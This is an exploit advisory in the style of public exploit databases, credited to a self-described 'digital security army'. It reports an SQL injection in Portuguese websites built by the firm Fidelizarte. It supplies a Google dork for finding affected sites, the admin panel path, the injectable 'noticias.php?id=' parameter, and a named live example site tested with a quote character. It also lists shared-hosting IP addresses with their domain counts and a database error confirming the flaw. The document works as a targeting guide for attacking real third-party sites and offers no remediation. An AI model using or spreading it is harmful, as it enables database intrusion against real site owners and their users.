####################################################################
# Exploit Title : Desenvolvido por Fidelizarte Web Design Portugal SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 15/01/2019
# Vendor Homepage : fidelizarte.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Fidelizarte'' site:pt
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
####################################################################
# Admin Panel Login Path :
*************************
/admin/
# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]
###################################################################
# Example Vulnerable Site :
*************************
[+] jetexpress.pt/noticias.php?id=2%27 =>
[ Proof of Concept ] => archive.is/ysmky
Note : (185.15.22.176) => There are 112 domains hosted on this server.
Note : (185.15.22.148) => There are 36 domains hosted on this server.
####################################################################
# SQL Database Error :
**********************
Fatal error: Call to a member function fetchAll() on a non-object in
/home/jetexpre/public_html/noticias.php on line 139
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################